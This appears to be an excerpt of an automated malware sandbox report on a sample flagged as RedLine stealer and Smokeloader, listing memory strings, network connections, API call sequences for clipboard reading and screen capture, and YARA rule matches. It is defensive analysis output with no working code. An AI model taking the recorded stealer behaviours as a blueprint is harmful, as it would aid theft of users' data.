            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1349882274.0000000003338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: xNuh0DUJaG.exe, 00000003.00000003.1349882274.0000000003338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1349882274.0000000003338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
            Source: xNuh0DUJaG.exe, 00000003.00000003.1349882274.0000000003338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
            Source: xNuh0DUJaG.exe, 00000003.00000003.1349882274.0000000003338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: xNuh0DUJaG.exe, 00000003.00000003.1349882274.0000000003338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: xNuh0DUJaG.exe, 00000003.00000003.1349882274.0000000003338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.10:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49725 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49743 version: TLS 1.2
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004367F0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_004367F0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004367F0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_004367F0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00436980 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,StretchBlt,ReleaseDC,DeleteObject,DeleteObject,3_2_00436980

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000003.00000002.1541906304.0000000000480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0043B8703_2_0043B870
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004088803_2_00408880
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0040B2B03_2_0040B2B0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00421E703_2_00421E70
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004157203_2_00415720
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0040CFEC3_2_0040CFEC
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004198403_2_00419840
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004068503_2_00406850
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004278603_2_00427860
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004270703_2_00427070
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004060003_2_00406000
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0043080E3_2_0043080E
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0043F8203_2_0043F820
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0041D0C03_2_0041D0C0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004418A03_2_004418A0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0041194F3_2_0041194F
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0043F1503_2_0043F150
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0042B1703_2_0042B170
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004039003_2_00403900
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004251003_2_00425100
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004399233_2_00439923
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004271333_2_00427133
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004339303_2_00433930
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004121DB3_2_004121DB
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0042A9F73_2_0042A9F7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0040E9B03_2_0040E9B0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0041825B3_2_0041825B
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0042EA623_2_0042EA62
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0040CA623_2_0040CA62
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00442A603_2_00442A60
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0041DAD03_2_0041DAD0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00429ADE3_2_00429ADE
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00425AF03_2_00425AF0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004092A03_2_004092A0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00405AB03_2_00405AB0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004042B03_2_004042B0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0043CB403_2_0043CB40
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0042EB5F3_2_0042EB5F
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004083603_2_00408360
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00428B673_2_00428B67
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00437B693_2_00437B69
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00402B203_2_00402B20
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00441B203_2_00441B20
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00432B243_2_00432B24
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004063C03_2_004063C0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0042DBF03_2_0042DBF0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004223803_2_00422380
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0041BBA03_2_0041BBA0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0042BBA03_2_0042BBA0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0042EBA13_2_0042EBA1
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0042EBB33_2_0042EBB3
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00441BB03_2_00441BB0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00441C403_2_00441C40
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004424703_2_00442470
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00426C763_2_00426C76
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0041D4003_2_0041D400
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0041C4003_2_0041C400
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004174053_2_00417405
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00414C203_2_00414C20
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004324263_2_00432426
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004284373_2_00428437
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0043443D3_2_0043443D
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004354C43_2_004354C4
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00434CEF3_2_00434CEF
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0043A4EF3_2_0043A4EF
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004374AB3_2_004374AB
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0041DCB03_2_0041DCB0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0043ACB03_2_0043ACB0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0042FCBC3_2_0042FCBC
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0040D5453_2_0040D545
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00425D6A3_2_00425D6A
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00435D133_2_00435D13
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00442D203_2_00442D20
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0043CD273_2_0043CD27
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00420D903_2_00420D90
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0043C5A03_2_0043C5A0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004366103_2_00436610
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004076203_2_00407620
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0040AE303_2_0040AE30
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0041F6D03_2_0041F6D0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00416ED03_2_00416ED0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0041BEE13_2_0041BEE1
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00402EF03_2_00402EF0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004186FC3_2_004186FC
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00423EFF3_2_00423EFF
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00431E8E3_2_00431E8E
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0041A6903_2_0041A690
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0041AF243_2_0041AF24
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00427F303_2_00427F30
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0040DFE23_2_0040DFE2
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004257E03_2_004257E0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00429FE43_2_00429FE4
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004097903_2_00409790
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004427B03_2_004427B0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00441FB03_2_00441FB0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0210D2533_2_0210D253
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0210E2493_2_0210E249
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_021062673_2_02106267
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0212A3053_2_0212A305
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0211D3273_2_0211D327
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_021273B23_2_021273B2
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0213F3B73_2_0213F3B7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_021420173_2_02142017
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0210B0973_2_0210B097
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_021260B73_2_021260B7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_021220D73_2_021220D7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_021320F53_2_021320F5
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_021031573_2_02103157
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0211C1483_2_0211C148
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_021241663_2_02124166
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_021281973_2_02128197
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0211B18B3_2_0211B18B
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_021066273_2_02106627
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0211D6673_2_0211D667
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0211C6673_2_0211C667
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0213268D3_2_0213268D
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_021346A43_2_021346A4
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_021426D73_2_021426D7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_021377123_2_02137712
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0213572B3_2_0213572B
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0213A7563_2_0213A756
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0210D7AC3_2_0210D7AC
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_021124423_2_02112442
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_021184C23_2_021184C2
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_021045173_2_02104517
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_021095073_2_02109507
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_021085C73_2_021085C7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_021225E73_2_021225E7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_02142A173_2_02142A17
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_02130A753_2_02130A75
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0213FA873_2_0213FA87
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_02106AB73_2_02106AB7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_02119AA73_2_02119AA7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0213BAD73_2_0213BAD7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_02117AE43_2_02117AE4
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_02108AE73_2_02108AE7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_02103B673_2_02103B67
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_02133B973_2_02133B97
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_02139B8A3_2_02139B8A
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_02111BB63_2_02111BB6
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0213C8073_2_0213C807
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_021368773_2_02136877
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_021078873_2_02107887
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0211A8F73_2_0211A8F7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0211F9373_2_0211F937
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_021099F73_2_021099F7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0212EE1A3_2_0212EE1A
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0212BE073_2_0212BE07
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0212EE083_2_0212EE08
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0212DE573_2_0212DE57
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_02114E873_2_02114E87
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0213AF173_2_0213AF17
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0211DF173_2_0211DF17
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0212FF233_2_0212FF23
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_02134F563_2_02134F56
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_02135F7A3_2_02135F7A
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_02142F873_2_02142F87
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_02120FF73_2_02120FF7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_02117FFA3_2_02117FFA
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0210EC173_2_0210EC17
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_02142CC73_2_02142CC7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0210CCC93_2_0210CCC9
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0212ECC93_2_0212ECC9
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_02105D173_2_02105D17
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0211DD373_2_0211DD37
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_02102D873_2_02102D87
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_02132D8B3_2_02132D8B
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0213CDA73_2_0213CDA7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_02137DD03_2_02137DD0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0212EDC63_2_0212EDC6
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: String function: 00414C10 appears 116 times
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: String function: 021083D7 appears 77 times
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: String function: 02114E77 appears 116 times
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: String function: 00408170 appears 45 times
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 1804
            Source: xNuh0DUJaG.exe, 00000003.00000000.1267391268.000000000044D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesOrehinal4 vs xNuh0DUJaG.exe
            Source: xNuh0DUJaG.exe, 00000003.00000003.1277152933.0000000000582000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesOrehinal4 vs xNuh0DUJaG.exe
            Source: xNuh0DUJaG.exeBinary or memory string: OriginalFilenamesOrehinal4 vs xNuh0DUJaG.exe
            Source: xNuh0DUJaG.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000003.00000002.1541906304.0000000000480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: xNuh0DUJaG.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@11/2
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004807A6 CreateToolhelp32Snapshot,Module32First,3_2_004807A6
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0043B870 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_0043B870
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7464
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\00805696-71f3-4ac6-851e-f70205b00fa8Jump to behavior
            Source: xNuh0DUJaG.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
